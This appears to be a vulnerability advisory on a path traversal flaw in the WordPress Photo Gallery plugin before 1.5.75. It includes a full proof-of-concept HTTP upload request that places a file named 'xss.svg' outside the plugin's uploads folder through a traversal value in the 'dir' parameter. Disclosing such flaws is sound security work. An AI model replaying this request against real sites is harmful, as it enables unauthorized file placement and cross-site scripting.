The plugin did not ensure that uploaded files are kept inside its uploads folder, allowing high privilege users to put images/SVG anywhere in the filesystem via a path traversal vector
The below requests will put the xss.svg file into the /wp-content/uploads/ folder rather than /wp-content/uploads/photo-gallery/ POST /wp-admin/admin-ajax.php?bwg_nonce=4ef81877b0&action;=bwg_UploadHandler&dir;=/…/ HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------61502566032120876251044562165 Content-Length: 1841 Connection: close Cookie: [high privilege user, such as admin] -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name=“bwg_nonce” d0b8d99404 -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name=“upload_thumb_width” 500 -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name=“upload_thumb_height” 500 -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name=“upload_img_width” 1200 -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name=“upload_img_height” 1200 -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name=“extensions” jpg,jpeg,png,gif,svg -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name=“callback” bwg_add_image -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name=“sort_by” date_modified -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name=“sort_order” desc -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name=“items_view” thumbs -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name=“files[]”; filename=“xss.svg” Content-Type: image/svg+xml -----------------------------61502566032120876251044562165–
CPE | Name | Operator | Version |
---|---|---|---|
photo-gallery | lt | 1.5.75 |